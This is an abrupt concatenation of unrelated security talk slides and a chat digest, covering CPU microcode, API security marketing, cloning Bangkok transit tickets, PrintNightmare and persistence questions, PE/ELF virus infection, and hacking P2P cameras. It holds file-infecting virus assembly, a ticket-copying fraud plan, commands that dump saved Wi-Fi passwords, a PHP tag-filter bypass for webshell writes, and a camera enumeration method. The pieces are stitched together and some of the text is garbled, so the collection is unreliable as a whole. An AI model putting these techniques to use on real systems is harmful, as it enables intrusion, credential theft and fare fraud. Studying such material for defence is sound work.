• Dynamically enabled by the CPU
• Access time: about 20 cycles
• Content not shared between cores
• Can fit 64-256Kb of valid data
• Replacement policy on the content?!
• It's a special CPU view on the L2 cache!
Parsing µcode updates
00000000: 0102 007c 3900 0a00 3f88 4bed c000 080c  ...|9...?.K.....
00000010: 0b01 4780 0000 0a00 3f88 4fad 0003 0a00  ..G.....?.O.....
00000020: 2f20 4b2d 8002 080c 0322 4740 a903 0a00  / K-....."G@....
00000030: 2f20 4f6d 1902 0002 0353 6380 c000 3002  / Om.....Sc...0.
00000040: b8a6 6be8 0000 0002 0320 63c0 0003 f003  ..k...... c.....
00000050: f8a6 6b28 c000 0800 03c0 0bed 0000 0b10  ..k(............
00000060: 7f00 0800 8001 3110 0300 a140 c000 310c  [email protected].
00000070: 0300 0700 0000 4012 0b30 6210 0003 4b1c  [email protected].
00000080: 7f00 0440 c000 3112 0310 2400 0000 310c  [email protected]...$...1.
00000090: 0300 01c0 0003 0800 03c0 0fad 0002 00d2  ................
Parsing µcode updates
A µcode update is bytecode: the CPU interprets commands from the µcode update
• reset
• write µcode
• hook match & patch
• write stgbuf
• write uram
• CRBUS cmd
• control flow directives
• nested decrypt (e.g., XuCode)
µcode decryptor
• Create a parser for µcode updates
• Automatically collect existing µcode(s) for GLM
• Decrypt all GLM updates
github.com/pietroborrello/CustomProcessingUnit/ucode_collection
Bonus Content 1: Skylake perf traces
Bonus Content 2: An APIC failed exploit
(Idea: the µcode update uses 0xfeb01000, inside the L2 cache MMIO region at 0xfeb00000 - so remap the APIC MMIO, normally at 0xfee00000, onto 0xfeb01000.)
Conclusion
• Deepen understanding of modern CPUs with µcode access
• Develop a static and dynamic analysis framework for µcode:
  • µcode decompiler
  • µcode assembler
  • µcode patcher
  • µcode tracer
• Let's control our CPUs!
github.com/pietroborrello/CustomProcessingUnit
Decoding API Security
Threats, Challenges, and Best Practices

APIs Are Everywhere
APIs are at the center of digital experiences:
• Mobile apps
• Websites and applications rely on APIs for core functionality (e.g., login)
• Modern microservice-based architectures
• APIs make multi-user experiences more powerful
• Regulations mandate the use of web APIs (such as PSD2 / Open Banking)

The Evolution of Web Application Attacks
(Timeline, with complexity rising over time:)
• Web application attacks: DoS, unvalidated input, authentication, code execution
• Attacks on web applications and infrastructure: buffer overflow, DoS/DDoS, XSS & SQLi, zero trust
• Multi-vector attacks on web apps, infrastructure, APIs, and browsers: bots, API threats, client-side threats, multi-vector DDoS, phishing (use of DGA)
• TODAY: multi-vector attacks driven by intelligent, automated orchestration tooling, weaponized machine-learning algorithms, and AI: deep learning and AI
API Attacks: The Attacker's Best Option
Compared with traditional attack patterns, APIs deliver better results at lower cost:
• 4X as much credential stuffing exploits APIs
• APIs carry more security issues and more weaknesses
The Growing Importance of API Security
• Multi-cloud and hybrid environments
• Microservice architectures
• SaaS / IaaS / PaaS
• Mobile
API growth at Akamai:
• API requests account for 83% of all traffic
• APIs are growing 30% year over year
• API calls will reach 42 trillion by 2024
"By 2022, API abuses will be the most-frequent attack vector resulting in data breaches for enterprise web applications."
- Gartner Research, "How to Build an Effective API Security Strategy"
2021: API vulnerabilities disclosed for GraphQL Security, Facebook, YouTube, NoxPlayer, Clubhouse, healthcare apps, VMWare & Microsoft etc.
- APISecurity.io is a community website for all things related to API security

Why Is API Security So Challenging?
• More applications and logic are moving to the cloud
• Greater emphasis on speed of innovation and agility
• API visibility has always been a major problem
• Lack of logging and monitoring
Organizations routinely underestimate API threats:
• They underestimate the impact
• Access restrictions are insufficient
• Protection methods are outdated
• There is no API reporting
• Risk is underestimated because of partner-ecosystem integrations
Understanding the API Attack Surface
• Risk keeps rising from third-party API integrations
• Attacks exploiting JSON/XML and parsers keep growing and have caused serious business disruption
• API-based applications outnumber HTML applications 3 to 1
• Attackers exploit weak authentication and authorization implementations
• Injection-style attacks remain relevant and widespread
The attack surface is shifting
(Diagram: specific attacks on JSON/XML and parsers, application vulnerabilities, third-party integration, login abuse, DoS/DDoS, auth, and unauthorized use all converge on the API.)

Types of API Attacks
• Credential stuffing
• DDoS: overwhelm API endpoints with bursts of distributed requests
• API parsing: attack the API's parsing capability through hash collisions or deserialization
• Malformed API requests: fuzz API input data and deeply nest the API schema
• Application vulnerabilities: embed SQLi or XSS payloads inside JSON/XML bodies, and exploit known vulnerabilities
• Authentication and authorization: bypass controls through broken object-level authorization and broken authentication
(Other angles: authentication, availability, API exposure and authorization issues, token/cookie extraction.)
Poll 1:
Which types of API security threats has your organization experienced?
o Credential stuffing
o DDoS
o Malformed API requests
o Application vulnerabilities
o Authentication and authorization
Scan the QR code for more information
(Credential-stuffing flow: exposed API parameters; fraudsters purchase leaked credentials; botnets replay username/password login attempts against the login API; on the client side this yields credential abuse, account takeover, and further credential leakage, monetized through ticket scalping and promotion abuse, and through loyal users' personal information, financial gain, and reward points.)

APIs: A Prized Target for Credential Abuse
100 billion such attacks were observed between 2018 and 2020
Credential abuse against APIs keeps growing
100 billion attacks were seen between 2018 and 2020, with complexity and volume rising every year:
• Losses from credential abuse run as high as $22.8 million
• 60% of new botnet activity involves credential theft
• Someone falls victim to identity theft every 30 seconds
• In financial services, APIs are exploited for credential abuse 4x as often as in other industries
Example #1: API exposure in the business ecosystem
API requests flow back and forth between a SaaS partner and the origin (user request in, origin response out).
Now consider a DDoS attack aimed at the SaaS partner: if you rely solely on the partner's security measures, the origin is very hard to protect.
Example #2: Data leaked through API responses
Developers often assume systems will be used as intended: "Only my mobile app calls my API."

curl https://api.orderinput.com/v1/sku \
  -u sku_4bC39lelyjwGarjt: \
  -d currency=usd \
  -d inventory[type]=finite \
  -d inventory[quantity]=500 \
  -d price=3 \
  -d product=prod_BgrChzDbl \
  -d attributes[size]=medium

HTTP 200 OK
https://success.api.orderinput.com/v1/sku
-id order_number=14586

1. A simple order calls the order-input API
2. The API response includes some interesting data

Developers rarely consider attack scenarios, especially unconventional ones: "Sequential order numbers are meaningful."
But what if I submit follow-up orders at different times and from different regions?

HTTP 200 OK
https://success.api.orderinput.com/v1/sku
-id order_number=23697
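That pair of responses is all an attacker needs: anyone who can place two orders can estimate order volume from the gap between sequential order numbers. A sketch of the inference in Python, reusing the hypothetical endpoint and field names from the example above:

import time
import requests

def place_order_and_get_number():
    r = requests.post("https://api.orderinput.com/v1/sku",
                      auth=("sku_4bC39lelyjwGarjt", ""),
                      data={"currency": "usd", "price": 3})
    return int(r.json()["order_number"])   # assumes a JSON response body

first = place_order_and_get_number()
time.sleep(24 * 60 * 60)                   # wait a day, maybe from another region
second = place_order_and_get_number()
print(f"~{second - first - 1} other orders were placed in 24h")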
Example #3: Attacking a microservice architecture
DevOps teams automate cloud functionality through APIs, and developers share code on GitHub.
(Diagram: code shared on GitHub feeds IT/Dev/Ops pipelines, which drive microservices sitting behind APIs.)
How do attackers identify an enterprise's APIs?
Step 1: Scan typical hostnames
Hostnames: auth., api., developer., download.
IP addresses: xxx.xxx.xxx.xxx, xx.xxx.xxx.xxx, ...
Step 2: Reverse-resolve the surrounding +/- 10 IP addresses to build a list of hostnames to attack
• Fierce is a domain discovery tool
The Gitrob tool:
Find (and remove) sensitive data on GitHub
• Search by organization
• Flags interesting content, such as:
  o Private keys
  o Usernames
  o Email addresses
  o Internal system information
A full-service tool for harvesting internal enterprise information that feeds API attacks, phishing campaigns, and social-engineering attacks.
Source: https://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/
Example #3: Attacking a microservice architecture
• Sample code is published and shared on GitHub
• Sensitive API keys are included in the samples
• Attackers use those API keys to gain unauthenticated access
(Diagram: GitHub code sharing feeds IT/Dev/Ops pipelines driving microservices behind APIs.)
Existing API Security Strategies
Traditional methods: encryption, rate throttling, visibility, access control, API governance, signature-based detection
Remaining gaps: API testing, application security
Poll 2:
Which API security strategies does your organization use today?
o Access control
o Signatures
o Rate throttling
o Visibility
o API governance
Scan the QR code for more information
In Security, Insights matter
A 360-degree view of the threats targeting the business is needed.
"Compared with traditional web applications, APIs tend to expose more endpoints, which makes building a proper, up-to-date inventory of resources very important."
- OWASP API Security Project
API Security Starts with Visibility
Discover: automatically inspect traffic, uncover unprotected API endpoints, and provide actionable workflows to apply protections quickly
• Discover and profile unknown and changing APIs, including API endpoints, definitions, resources, and traffic characteristics
Protect and manage: defend against API-based DDoS and injection attacks, and enforce API authentication and authorization
• Respond quickly to API attacks on systems and applications to avoid downtime and data theft
Deliver: raise the scale and performance of API traffic
• Traffic optimization
• API-first designs that head off overload
• Load-test API performance ahead of peak events
Defend Against API Threats, Reduce API Risk
Challenges and solutions
Challenges: API leakage, credential abuse, authorization and authentication, API scraping and data theft
Best practices:
• Use advanced bot detection (login validation)
• Use an API gateway for authentication, authorization, and API access management
• Run the WAF with both positive and negative security models (API rule inspection)
• Discover API traffic behavior, with fast integration into WAF/DDoS controls
Defend Against API Threats, Reduce API Risk
Reference architecture: API discovery and security

Overview
API security is an often-overlooked problem, and the cost of ignoring it is exposure to attack, data breaches, and damage to revenue and brand value. Akamai's solution protects your APIs against DDoS, application-layer, and credential-stuffing attacks, extending edge security across a broad and messy attack surface.
1. Legitimate and malicious traffic alike reaches the API services through the Akamai intelligent edge platform.
2. Edge servers automatically detect and mitigate application-layer DDoS attacks.
3. Threat intelligence from the Akamai platform scores attacker behavior and applies the appropriate action.
4. Malicious content in API requests is automatically detected and blocked; a positive security model protects data reads and writes according to the API specification, shielding backend microservices and applications from DoS attacks.
5. Bot Manager defends against bot attacks that abuse the APIs.
6. SSL/TLS encryption keeps sensitive data from leaking in transit.
7. The API gateway validates API requests so that only legitimate users reach API resources.
8. Edge caching of API responses improves performance and cuts infrastructure and bandwidth costs.
9. Security information and events are captured, retained, and delivered to a SIEM platform in real time.
(Diagram labels: DDoS protection; authentication & authorization; scale and accelerate; discover and protect; govern and control; bot, server, app, attacker, and browser clients; edge platform; services in data centers and cloud data centers; JSON/XML and GraphQL/REST traffic; data integration and analytics; Bot Manager; reputation control; WAF rule inspection / API query constraints; edge caching; SIEM integration; SSL/TLS encryption; legitimate vs. malicious traffic.)
API Security Checklist
Discover:
• The API ecosystem
• Focused testing
• Release and rollback design and strategy
Protect:
• User identity
• DoS/DDoS
• Positive and negative security models
• Optimize API security through API management
Analyze:
• Risk assessment
• API metrics
• API audits
Resources
• How Akamai Helps to Mitigate the OWASP API Security Top 10 Vulnerabilities
https://www.akamai.com/us/en/multimedia/documents/white-paper/how-akamai-helps-to-mitigate-the-owasp-api-security.pdf
• Web Application and API Protection Capabilities Checklist
https://www.akamai.com/cn/zh/multimedia/documents/white-paper/web-application-and-api-protection-capabilities-checklist.pdf
• Strategies for API Security
https://www.akamai.com/us/en/multimedia/documents/white-paper/akamai-strategies-for-api-security-white-paper.pdf
• Accelerate, Protect, and Manage APIs
https://www.akamai.com/cn/zh/solutions/performance/apis.jsp
• Akamai's latest State of the Internet report
https://www.akamai.com/cn/zh/multimedia/documents/state-of-the-internet/soti-security-phishing-for-finance-report-2021.pdf
Scan the QR code for more information
DefCon 27, Las Vegas 2019
Breaking the back end!
Gregory Pickett, CISSP, GCIA, GPEN
Chicago, Illinois
[email protected]
Hellfire Security
Overview
Transit System
Reverse Engineering
My Discoveries
The Exploit
The Lessons
How This Is Different
This is not illegal
We aren’t sneaking into the station
We aren’t hacking their terminals
We aren’t social engineering anyone or attacking
their wired/wireless network
This is not about the hardware
We aren’t cracking anyone’s encryption
We aren’t cloning the magstripe, RFID, or NFC
How This Is Different
This Is About
Flaws in the Application Logic
OK. Cloning is involved but it is not the
vulnerability exploited
Using AppSec to attack Complex Multi-Layered
Real World Solutions
Elevated Train
Bangkok Mass Transit System (BTS)
Elevated rapid transit system in Bangkok,
Thailand
Serves Greater Bangkok Area
Operated by Bangkok Mass Transit System PCL
(BTSC)
43 stations along two lines
Tickets
Stored-Value Card (NFC)
All Day Pass (Magstripe) and Single Journey
(Magstripe)
Two magstripes
Hole through one magstripe
Only 0.27mm thick
The Equipment
Standard Reader/Writer
Manufactured in China
Standards or Raw Read
Errors Rare
Reliable Performance
Lab Work
Attempted Decode Using Standards
International Organization for Standardization
6-bit Character sets and 4-bit Character sets
Some With Parity and Some Without
Attempted Decode both forwards and
backwards
It wasn’t using the standards
Lab Work
There is no encryption.
There are no parity checks
There was no longitudinal redundancy check
(LRC)
There are no timestamps
Field Work
* The section "7826" is the Ticket Type
* The section "00FF74" is always 100 + the price of the ticket
* For all day passes, the section "00FF74" is used to track trips taken
Field Work
(Diagram: the ticket's GUID follows it from the station dispenser to the station turnstile, and the back end tracks that same GUID.)
Field Work
Handling Rules
To Enter,
Ticket must have previously been in “Collected”
State
Ticket Must Now Be In "Issued" State
To Exit, Ticket Must Be In “Used” State
Exploiting This System
What We Have Learned So Far
System Safeguards
Their Assumptions
Attacks Against Their Assumptions
Epic Fail!
What We Have Learned So Far
Object Based
Physical Object
Database Object
Properties
Identification
Type
Value
Location
What We Have Learned So Far
States
Issued
Used
Collected
History
System Safeguards
Ticket Composition and Ticket Design
Mirror Physical Object and Database Object
Handling Rules Define Valid Use of The Objects
Lifecycle limited to Twenty-Four Hours
Collection of Ticket After Use
Their Assumptions
No One Will Be Able to Reproduce Our Ticket
Our System Has The Only Valid Objects
Handling Rules Will Prevent Concurrent Use
Damage is limited by Lifecycle
After Use, Ticket Will Be In Our Possession
Attacks Against Assumptions
Acquire Suitable Ticket
Capture Valid Object
Bypass Rules
Extend the Attack to Increase the Damage
Epic Fail!
Found Someone to Make Blank Tickets
Copied Shit Ton of Objects in “Issued” State
Found Flaw In the Handling Rules
“Collected” State found in Current Lifecycle
Overrides all other states!
Object Always Seen Recently “Collected”
Run The Original Ticket
All Copies Immediately Become Valid
Epic Fail!
X
X
X
Epic Fail!
√
√
√
Epic Fail!
Epic Fail! (Demonstration)
Turning The Exploit Into An Attack
Tickets
Plan
Tickets
The Plan
Buy Ticket (Daily Pass)
Copy Ticket
Use Original
Hand Out Copies
Have Fun!
Repeat Tomorrow!
Results of The Attack
Extend the attack!
Test All Layers of a Solution
Test for Application Issues
Check Your Assumptions
Use Compensating and Mitigating Controls
Avoiding Their Fate
Links
https://wikileaks.org/wiki/Anatomy_of_a_Subway_Hack_2008
https://file.wikileaks.org/file/anatomy-of-a-subway-hack.pdf
https://defcon.org/images/defcon-16/dc16-presentations/anderson-ryan-
chiesa/47-zack-reply-to-mbta-oppo.pdf
https://www.computerworld.com/article/2597509/def-con--how-to-hack-
all-the-transport-networks-of-a-country.html
https://www.cio.com/article/2391654/android-nfc-hack-enables-travelers-
to-ride-us-subways-for-free--researchers-say.html
https://www.youtube.com/watch?v=-uvvVMHnC3c
https://www.blackhat.com/docs/asia-17/materials/asia-17-Kim-Breaking-
Korea-Transit-Card-With-Side-Channel-Attack-Unauthorized-Recharging-
wp.pdf
Links
https://www.msrdevice.com
https://www.msrdevice.com/product/misiri-msr705x-hico-magnetic-card-
reader-writer-encoder-msr607-msr608-msr705-msr706
https://www.alibaba.com/
https://nexqo.en.alibaba.com
http://www.nexqo.com/
https://www.bts.co.th/
http://www.btsgroup.co.th
Group Chat Highlights, 2021-08-26

@只要ID够长,别人就不能看到我 asked:
While reproducing the PrintNightmare local privilege escalation I hit a problem: with an ordinary user account the escalation fails, i.e. the DLL won't load; only with administrator privileges does the DLL load and escalate to SYSTEM. In theory shouldn't this be user -> SYSTEM?

@wolvez answered:
Check whether the patch has been applied, and put the DLL somewhere the service can access; newer builds get the patch automatically.

Resolved: it really was the monthly patch, quietly pushed on August 10.

@王半仙 asked:
I used msf's exploit/windows/local/persistence to plant a persistence backdoor. On Windows 2008 R2, after logging off, the registry entry is still there but the file is gone. Has anyone else run into this?

@skrtskrt answered:
Reproduced it. https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.TerminalServer::TS_TEMP_PER_SESSION : once RDP is in play, every user session's temp directory is keyed by session ID; if you have never logged in over RDP there is no session ID and files land straight in the temp directory.
https://admx.help/ is a good site for looking up all sorts of policy settings.

@B1ngDa0 asked:
These two commands will list the profiles a user has connected to, along with the Wi-Fi passwords. Is there a way, or a command, to tell which profile is currently connected?

@A. answered:
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear

@David asked:
A question about an arbitrary file write in PHP:
echo 111 > /root/1.php works
echo with a PHP open tag fails (the exact payloads were eaten by the chat formatting)
< and > are filtered. Is there a way around this?

@ShadowMccc answered: (screenshot lost)

@&男儿行? answered:
echo -e "\x3C" > 111.txt

@Digg3r answered:
echo -n, appending one character at a time

@David, resolved:
PHP syntax: instead of <?php, use <script language=php. Yesterday's upload was cracked the same way; when <? was blocked, this trick got around it too.

Author: L.N. / Date: 2021-08-26 / Produced by AttackTeamFamily / Welcome to www.red-team.cn
Comparison Of File Infection On The
Windows And Linux
lclee_vx / F-13 Labs, lychan25/F-13 Labs
[www.f13-labs.net]
Overview
• Introduction
• What is Win32 and ELF32 ?
• The PE File Format and ELF File Format
• Win32 File Infection (Windows Platform) and ELF File Infection (Linux
Platform)
• Demo
• Comments
• References
Introduction
• A virus is a program that reproduces its own code by attaching itself to other executable files in such a way that the virus code is executed when the infected executable file is executed. [Defined at Computer Knowledge Virus Tutorial, @Computer Knowledge 2000]
• This section introduces the common file infection strategies that virus writers have used over the years on the Windows and Linux platforms.
Introduction: Win32 and ELF32
Win32 refers to the Application Programming Interface (API) available in the Windows operating system.
The ELF32 standard defines a portable object file format for 32-bit Intel Architecture environments.
Introduction: PE /ELF File Format
What is Portable Executable (PE) file format?
- Microsoft’s format for 32-bit executables and object files
(DLLs)
- compatible across 32-bit Windows operating systems
Introduction: PE /ELF File Format
What is the Executable and Linking Format?
• Part of the ABI
• Streamlines software development
• Three main ELF object file types (relocatable/executable/shared)
• Two views - Executable/Linking
Introduction: PE File Format
PE File Layout
Introduction: ELF File Format
ELF File Layout
Linking View
Execution View
Demonstration
PE File Infection
Demo 1 – PE File Infection
1. Get the delta offset
VirusStart:
call
Delta
Delta:
pop
ebp
mov
ebx, ebp ;ebx=ebp
sub
ebp, offset Delta
2. Get the Kernel32.dll address
GetK32      proc
            push    eax
Step1:
            dec     esi                     ; walk backwards through memory
            mov     ax, [esi+3ch]           ; read the would-be e_lfanew field
            test    ax, 0f000h              ; a real PE header offset is small
            jnz     Step1
            cmp     esi, [esi+eax+34h]      ; does ImageBase point back at this base?
            jnz     Step1
            pop     eax
            ret
GetK32      endp
Demo 1 – PE File Infection
3. Scan Kernel32.dll and get the addresses of other API functions
- Scan KERNEL32.DLL and retrieve the address of other API functions using a checksum
- Formula:
1. eax = index into the array of name ordinals
2. Ordinal = eax*2 + [AddressOfNameOrdinals]
3. Address of Function (RVA) = Ordinal*4 + [AddressOfFunctions]
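The same lookup written out over an already-parsed export directory may help; a Python sketch where the array names follow the PE export directory fields and the checksum routine stands in for whatever hash the virus actually uses:

def resolve_export(names, name_ordinals, functions, target, checksum):
    # names: exported symbol names; name_ordinals/functions: the parsed
    # AddressOfNameOrdinals and AddressOfFunctions arrays
    for i, name in enumerate(names):
        if checksum(name) == target:          # compare hashes, not strings
            ordinal = name_ordinals[i]        # word-sized index (the *2 above)
            return functions[ordinal]         # dword entry (the *4 above): the RVA
    return None

# toy demo with a made-up checksum
crc = lambda s: sum(map(ord, s)) & 0xffff
print(hex(resolve_export(["CreateFileA", "ExitProcess"], [0, 1],
                         [0x12340, 0x15678], crc("ExitProcess"), crc)))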
4. Scan the target file
in the current directory
DirectoryScan
proc
lea eax, [ebp+offset CurtDirectory]
push eax
push max_path
mov eax, dword ptr [ebp+offset
aGetCurrentDirectoryA
call eax
lea eax, [ebp+offset CurtDirectory]
push eax
mov eax, dword ptr [ebp+offset
aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles
ret
DirectoryScan
endp
Demo 1 – PE File Infection
5. File Injection with adding
the new section
- Get the File Attributes, File Handle of target file
- Allocate the specified bytes in the heap
- Read the target file and mark the infected file with “chan”
in [PE Header+4ch]
- Add the new section named “lych”
- Copy the virus body into new section
6. Copy the virus body
into
new section
7. Exit and return control
to the host file
Demo 1 – PE File Infection
Before PE File Infection
Demo 1 – PE File Infection
After PE File Infection
Demonstration
ELF File Infection
Demo 2 – ELF File Infection
1. Get the delta offset
_start:
call
Delta
Delta:
pop
ebp
sub
ebp, Delta
2. Control access to a
region of memory
mov
edx, 07h
mov
ecx, 04000h
lea
ebx, [ebp+_start]
and
ebx, 0FFFFF000h
call
SYS_mprotect
Note: all Linux system calls can be accessed with int 80h
Demo 2 – ELF File Infection
3. Scan the target file in
current directory
1. Check the file type
//-----------------------
mov
eax, dword [esi]
cmp
eax, 0x464C457F
jne
near UnMap
2. Check whether the file is already infected
//--------------
mov eax, dword [ebp+_start]
cmp dword [esi], eax
jz UnMap
4. Check the file type and whether it is already infected
Demo 2 – ELF File Infection
5. Enough space for Virus
body
1. Check the space for virus body
//----------------------------------
mov eax, dword [edi+14h]
sub
eax, ebx
mov
ecx, VxEnd - _start
cmp
eax, ecx
jb near UnMap
6. Overwriting host code
by viral code
1. Get the value of
a. e_ehsize (elf header size)
b. eh_entrypoint (entry point)
c. eh_ph_count (ph number)
d. eh_ph_entrysize (ph entry size)
2. e_entry < p_addr + p_memsz
3. Write the frame and virus
Demo 2 – ELF File Infection
7. Exit and return to the
host program
1. UnMap the ELF file and return to the host program
Note: the size of the ELF file increases
Demo 2 – ELF File Infection
Before ELF File Infection
Demo 2 – ELF File Infection
After ELF File Infection
Conclusions
• Linux binary viruses have a hard time infecting ELF executables and spreading
• The task of propagation on a Linux system is made much more difficult by the limited privileges of the user account
• It is easier to access Linux system calls, thanks to int 80h
Reference
• Szor, Peter. Attacks on Win32. Virus Bulletin Conference, October 1998, Munich/Germany, pages 57-84.
• Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format: http://msdn.microsoft.com/msdnmag/issues/02/02/PE/defau.
• Microsoft Portable Executable and Common Object File Format Specification: http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx
Reference
• Silvio Cesare, 1999. Unix Viruses
• Billy Belcebu, 1999. Viruses under Linux, Xine – Issue #5
• @Computer Knowledge 2000, 2000. Computer Knowledge
Virus Tutorial
• http://www.f13-labs.net
• http://www.eof-project.net
• Many thanks go to moaphie, izee, skyout, synge, robinh00d, Invizible, etc.
-Thank You –
[email protected]
[email protected] | pdf |
Paul Marrapese <[email protected]>
DEF CON 28
Abusing P2P to Hack
3 Million Cameras
What is this talk?
• Overview of "convenience" feature found in millions of IoT devices
• P2P is found in cameras, baby monitors, smart doorbells, DVRs, NASes, alarm systems…
• Hundreds of different brands impacted (supply chain issue)
• How P2P exposes devices to the world
• Devices are instantly accessible, even with NAT/firewalls
• Obscure architecture and protocol (these devices aren't on Shodan!)
• How P2P can be abused to remotely attack devices
• Stealing creds with over-the-Internet MITM attacks
• Exploiting devices behind firewalls to get root shells
$ whoami
• Paul Marrapese (OSCP)
• San Jose, CA
• @PaulMarrapese / [email protected]
• h=ps://hacked.camera
• Red team at a large enterprise cloud company (opinions expressed are solely my own)
• Reverse engineering, music producEon, photography
All good things start with cats.
Cheap cams galore
Cheap cams galore
Shady cams galore!
Shady cams galore!
What is peer-to-peer (P2P)?
• In the context of IoT, a convenience feature for connectivity
• Plug and play: users can instantly connect to devices from anywhere
• Eliminates technical barriers barriers for non-technical users
• No port forwarding required
• No dynamic DNS or remembering IP addresses required
• No UPnP required (P2P is not UPnP)
• Automatically accepts connections, even with NAT/firewall restrictions
• Your cheap camera's gaping security holes are now open to the world. Good luck. 😱
Who provides P2P?
• Several different providers of P2P soluEons in the industry
• Largest is probably ThroughTek (TUTK)'s Kalay plaWorm (> 66m devices1)
• This talk will focus on 2 in parEcular:
• CS2 Network P2P (> 50m devices2)
• Libs: PPPP_API, PPCS_API, libPPPP_API, libPPCS_API
• Shenzhen Yunni iLnkP2P (>3.6m devices)
• FuncEonally-idenEcal clone of CS2 P2P (even has compaEble API)
• Libs: libxqun, libXQP2P_API, libobject, PPPP_API
1: https://www.throughtek.com/kalay_structure.html
2: http://cs2-network.cn/iot/about/slide/slide.php?slide=1
What are the risks of P2P?
• P2P, by design, is meant to expose devices
• In many cases, no way to turn it off
• You can obtain direct access to any device if you have its UID (unique identifier)
• Devices are usually ARM-based, running BusyBox with everything as root
• What could *possibly* go wrong? 🤔
• Tired: Eavesdropping, data theft, disabling security systems
• Wired: Pre-auth RCE on millions of devices 👀💦
Anatomy of a P2P Network
P2P Servers
• Our gateway to millions of devices
• Manage all devices in the network
• Orchestrate connections between clients and devices
• Essentially C&C servers
• Owned and operated by device manufacturers
• Often hosted using Alibaba cloud or AWS (usually in sets of 3 for redundancy)
• Listens on UDP port 32100
• Hundreds of these on the Internet
Devices
• All have their own unique idenEfier (UID)
• Key concept: used for connecEng to the device
• i.e., users don't directly use IP addresses
• Should be considered "sensiEve"
• Anyone who knows the UID can connect
• Generated by P2P provider and provided to device
manufacturer
• Wri=en to device NVRAM during manufacturing, someEmes printed on label
Device UID
• Prefix: Used for vendor/product grouping (up to 8 letters)
• Vendor may have several (e.g. DEFA, DEFB, DEFC)
• Vendor's P2P server will only support their specific prefixes
• Serial Number: Device identifier (typically 6-7 digits)
• Sequentially generated
• Check Code: Used to protect UIDs and prevent spoofing (5-8 letters)
• Security feature
• Generated using secret algorithm by the P2P provider
DEFC-000123-HAXME
Prefix
Serial Number
Check Code
Client
• Desktop/mobile app for connecEng to device
• User enters UID in client, client sends connecEon request
to the P2P servers
Protocol
• Entirely UDP
• Control messages to establish connections
• "DRW" (device read/write) messages wrap application data (e.g. video, audio)
• Guarantees both order and delivery despite being UDP
• Most messages are just packed C structs with a 4-byte header
• Magic number (always 0xF1), message type (uint8), payload length (uint16)
• Developed Wireshark dissector to aid with reversing and traffic analysis
Wireshark P2P dissector
Connecting to Devices
(or, how to punch through firewalls)
UDP hole punching
• A technique to establish direct connections even with NAT/firewalls
• Takes advantage of how NAT creates inbound rules based on outbound packets
• For example: if we make a DNS request, the router needs to create a rule so the response
gets back to us
• If we have a target IP and port, we can create a rule by sending a packet there
• But how do we know the peer's IP and port if we can't talk to them?
• We can use the P2P server to exchange address information!
• Both sides can then send packets to each other, which creates rules in their respective NATs
to let packets from the other side through
• Why yes, this *is* very similar to STUN!
UDP hole punching
UDP hole punching
UDP hole punching
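The whole trick fits in a few lines of code. A toy Python sketch of one side of the punch, assuming the peer's public IP and port have already arrived from the rendezvous server (addresses below are placeholders):

import socket, time

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("0.0.0.0", 40000))            # keep one local port for the whole dance
peer = ("203.0.113.7", 41234)            # learned out-of-band from the P2P server

for _ in range(5):
    sock.sendto(b"punch", peer)          # outbound packet creates the NAT rule...
    time.sleep(0.2)

sock.settimeout(5)
data, addr = sock.recvfrom(2048)         # ...so the peer's packets now get through
print("direct path established with", addr)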
UDP hole punching
Relayed connections
• UDP hole punching doesn’t always work
• As a fallback, peers can talk through a "relay server":
• If both sides can connect to the same relay, it can proxy traffic between them
Superdevices
• Devices that act as relays to support the network
• Users have no way to opt out of this (hope you don’t have bandwidth quotas!)
• Sketchy, but not actually uncommon in P2P architectures (supernodes)
• Spoiler alert: we're going to have fun with these. 😈
Hun:ng for Devices
Finding P2P Servers
• Desktop and phone apps are one way to find P2P server addresses
• More efficient: nmap UDP probes on cloud provider IP ranges!
• Send hello message (0xf1000000) to UDP port 32100
• Valid P2P servers will respond with ACK message (0xf1010000)
• Add udp 32100 "\xf1\x00\x00\x00" to /usr/share/nmap/payloads
• nmap -n -sn -PU32100 --open -iL ranges.txt
• 618 confirmed P2P servers discovered as of July 2020
• Discrepancies in responses allowed a fingerprinting technique to be developed
• 86% are CS2, 14% are iLnkP2P
Finding Prefixes
• To use P2P servers, we need to find out which prefixes they support
• Again, desktop and phone apps are one way to find prefixes
• Also, Amazon reviews…
Finding Prefixes
Finding Prefixes
Invalid prefix (0xFD)
Invalid UID, valid prefix (0xFF)
Request:
Response:
Finding Prefixes
Finding Prefixes
• Can infer validity of prefix from server response code
• 0xFD: Invalid prefix
• 0xFF: Valid prefix but invalid serial / check code
• Can brute force all 3-letter combinations in ~1hr, 4 letter in ~36hrs
• No rate limiting!
• Discovered 488 distinct prefixes on 487 P2P servers as of July 2020
• Average is 4 per server, but some servers support >130 prefixes
Finding UIDs
• We have prefixes, we can easily infer serial numbers (sequential numbers)
• The problem is now the check code:
• Exists to stop precisely this sort of attack
• If the UID is DEFC-000123-HAXME, DEFC-000123-HAXMF will not work
• Keyspace makes brute forcing impractical
• How can we get around this?
Predictable iLnkP2P UIDs (CVE-2019-11219)
• Some iLnkP2P libraries shipped with their secret check code algorithm
• Uses modified MD5; the check code is the le=ers from the resulEng hash (i.e. A-F)
• Apparently included to validate UIDs, even though the server already does that 🤷
• We can now connect to any device that uses iLnkP2P
Predictable iLnkP2P UIDs (CVE-2019-11219)
Predictable iLnkP2P UIDs (CVE-2019-11219)
• Over 3.6 million devices as of July 2020, many of which use default passwords
• Disclosed to Shenzhen Yunni Technology in February 2019
• No response despite several attempts
• New iLnkP2P UIDs are still being issued today
• Does not affect CS2… but more on that later.
Exploiting Devices
(or, how to shoot fish in a barrel)
Let's find some camera vulns!
• Shenzhen Hichip Vision Technology, Co.
• Major manufacturer, worldwide market (ODM)
• Used by a huge number of OEMs
• OEMs buy from Hichip and add their own branding
• Can easily identify OEMs by their use of the "CamHi" app
• At least 50 P2P servers and 29 prefixes
• 2.95 million (81%) of the iLnkP2P devices I've found have been Hichip
OEMs using Hichip
Accfly
Dericam
ICAMI
Nettoly
ThinkValue
Alptop
Elex System
ieGeek
OWSOO
THOMSON
Anlink
Elite Security
Jecurity
PNI
TOMLOV
Avidsen
ENSTER
Jennov
ProElite
TonTon Security
Besdersec
ePGes
KKMoon
QZT
TPTEK
